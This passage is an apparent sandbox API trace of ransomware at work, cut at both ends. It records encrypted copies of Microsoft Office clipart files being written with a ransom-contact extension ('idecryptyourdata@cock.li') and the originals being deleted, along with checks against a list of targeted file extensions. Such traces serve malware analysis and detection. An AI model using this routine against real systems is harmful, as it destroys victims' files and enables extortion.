dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0065.400] GetLastError () returned 0x0 [0065.400] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x244, lpOverlapped=0x0) returned 1 [0065.401] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x250, lpOverlapped=0x0) returned 1 [0065.402] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.402] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.402] SetEndOfFile (hFile=0x350) returned 1 [0065.402] CloseHandle (hObject=0x350) returned 1 [0065.403] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.403] SetEndOfFile (hFile=0x2c8) returned 1 [0065.403] CloseHandle (hObject=0x2c8) returned 1 [0065.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf")) returned 1 [0065.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.405] lstrlenW (lpString=".doc") returned 4 [0065.405] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.405] lstrlenW (lpString=".docx") returned 5 [0065.405] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.405] lstrlenW (lpString=".pdf") returned 4 [0065.405] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.405] lstrlenW (lpString=".xls") returned 4 [0065.405] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.405] lstrlenW (lpString=".xlsx") returned 5 [0065.405] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.405] lstrlenW (lpString=".ppt") returned 4 [0065.405] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.405] lstrlenW (lpString=".zip") returned 4 [0065.405] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.405] lstrlenW (lpString=".rar") returned 4 [0065.405] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.405] lstrlenW (lpString=".bz2") returned 4 [0065.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.405] lstrlenW (lpString=".7z") returned 3 [0065.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.405] lstrlenW (lpString=".dbf") returned 4 [0065.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.406] lstrlenW (lpString=".1cd") returned 4 [0065.406] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 68 [0065.406] lstrlenW (lpString=".jpg") returned 4 [0065.406] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.407] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.407] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.408] GetLastError () returned 0x0 [0065.408] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x128, lpOverlapped=0x0) returned 1 [0065.409] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x130, lpOverlapped=0x0) returned 1 [0065.410] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.410] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.418] SetEndOfFile (hFile=0x340) returned 1 [0065.419] CloseHandle (hObject=0x340) returned 1 [0065.419] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.419] SetEndOfFile (hFile=0x2c8) returned 1 [0065.420] CloseHandle (hObject=0x2c8) returned 1 [0065.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf")) returned 1 [0065.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.421] lstrlenW (lpString=".doc") returned 4 [0065.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.421] lstrlenW (lpString=".docx") returned 5 [0065.421] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.421] lstrlenW (lpString=".pdf") returned 4 [0065.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.421] lstrlenW (lpString=".xls") returned 4 [0065.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.421] lstrlenW (lpString=".xlsx") returned 5 [0065.421] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.421] lstrlenW (lpString=".ppt") returned 4 [0065.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.421] lstrlenW (lpString=".zip") returned 4 [0065.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.421] lstrlenW (lpString=".rar") returned 4 [0065.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.421] lstrlenW (lpString=".bz2") returned 4 [0065.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.422] lstrlenW (lpString=".7z") returned 3 [0065.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.422] lstrlenW (lpString=".dbf") returned 4 [0065.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.422] lstrlenW (lpString=".1cd") returned 4 [0065.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 68 [0065.422] lstrlenW (lpString=".jpg") returned 4 [0065.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.430] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.430] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.432] GetLastError () returned 0x0 [0065.432] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x8fc, lpOverlapped=0x0) returned 1 [0065.454] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x900, lpOverlapped=0x0) returned 1 [0065.455] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.455] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.455] SetEndOfFile (hFile=0x2c0) returned 1 [0065.456] CloseHandle (hObject=0x2c0) returned 1 [0065.457] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.457] SetEndOfFile (hFile=0x354) returned 1 [0065.459] CloseHandle (hObject=0x354) returned 1 [0065.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf")) returned 1 [0065.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.460] lstrlenW (lpString=".doc") returned 4 [0065.460] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString=".docx") returned 5 [0065.461] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.461] lstrlenW (lpString=".pdf") returned 4 [0065.461] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString=".xls") returned 4 [0065.461] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.461] lstrlenW (lpString=".xlsx") returned 5 [0065.461] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.461] lstrlenW (lpString=".ppt") returned 4 [0065.461] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.461] lstrlenW (lpString=".zip") returned 4 [0065.461] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.461] lstrlenW (lpString=".rar") returned 4 [0065.461] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString=".bz2") returned 4 [0065.461] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString=".7z") returned 3 [0065.461] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.461] lstrlenW (lpString=".dbf") returned 4 [0065.461] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.461] lstrlenW (lpString=".1cd") returned 4 [0065.461] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 68 [0065.461] lstrlenW (lpString=".jpg") returned 4 [0065.461] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.462] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.462] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.462] GetLastError () returned 0x0 [0065.462] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1b2e, lpOverlapped=0x0) returned 1 [0065.479] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1b30, lpOverlapped=0x0) returned 1 [0065.479] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.479] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.480] SetEndOfFile (hFile=0x2c0) returned 1 [0065.480] CloseHandle (hObject=0x2c0) returned 1 [0065.480] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.481] SetEndOfFile (hFile=0x354) returned 1 [0065.481] CloseHandle (hObject=0x354) returned 1 [0065.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf")) returned 1 [0065.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.482] lstrlenW (lpString=".doc") returned 4 [0065.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.482] lstrlenW (lpString=".docx") returned 5 [0065.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.482] lstrlenW (lpString=".pdf") returned 4 [0065.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.482] lstrlenW (lpString=".xls") returned 4 [0065.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.482] lstrlenW (lpString=".xlsx") returned 5 [0065.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.482] lstrlenW (lpString=".ppt") returned 4 [0065.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.483] lstrlenW (lpString=".zip") returned 4 [0065.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.483] lstrlenW (lpString=".rar") returned 4 [0065.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.483] lstrlenW (lpString=".bz2") returned 4 [0065.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.483] lstrlenW (lpString=".7z") returned 3 [0065.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.483] lstrlenW (lpString=".dbf") returned 4 [0065.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.483] lstrlenW (lpString=".1cd") returned 4 [0065.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 68 [0065.483] lstrlenW (lpString=".jpg") returned 4 [0065.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.483] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.483] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.484] GetLastError () returned 0x0 [0065.484] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3044, lpOverlapped=0x0) returned 1 [0065.767] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3050, lpOverlapped=0x0) returned 1 [0065.768] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.768] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.768] SetEndOfFile (hFile=0x2c0) returned 1 [0065.768] CloseHandle (hObject=0x2c0) returned 1 [0065.769] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.769] SetEndOfFile (hFile=0x354) returned 1 [0065.778] CloseHandle (hObject=0x354) returned 1 [0065.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf")) returned 1 [0065.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.779] lstrlenW (lpString=".doc") returned 4 [0065.780] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString=".docx") returned 5 [0065.780] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.780] lstrlenW (lpString=".pdf") returned 4 [0065.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString=".xls") returned 4 [0065.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.780] lstrlenW (lpString=".xlsx") returned 5 [0065.780] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.780] lstrlenW (lpString=".ppt") returned 4 [0065.780] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.780] lstrlenW (lpString=".zip") returned 4 [0065.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.780] lstrlenW (lpString=".rar") returned 4 [0065.780] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString=".bz2") returned 4 [0065.780] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString=".7z") returned 3 [0065.780] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.780] lstrlenW (lpString=".dbf") returned 4 [0065.780] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.780] lstrlenW (lpString=".1cd") returned 4 [0065.780] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 68 [0065.780] lstrlenW (lpString=".jpg") returned 4 [0065.780] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.781] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.781] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.782] GetLastError () returned 0x0 [0065.782] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x17b4, lpOverlapped=0x0) returned 1 [0065.987] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x17c0, lpOverlapped=0x0) returned 1 [0065.988] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.988] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.988] SetEndOfFile (hFile=0x2c0) returned 1 [0065.988] CloseHandle (hObject=0x2c0) returned 1 [0065.989] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.989] SetEndOfFile (hFile=0x354) returned 1 [0065.990] CloseHandle (hObject=0x354) returned 1 [0065.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 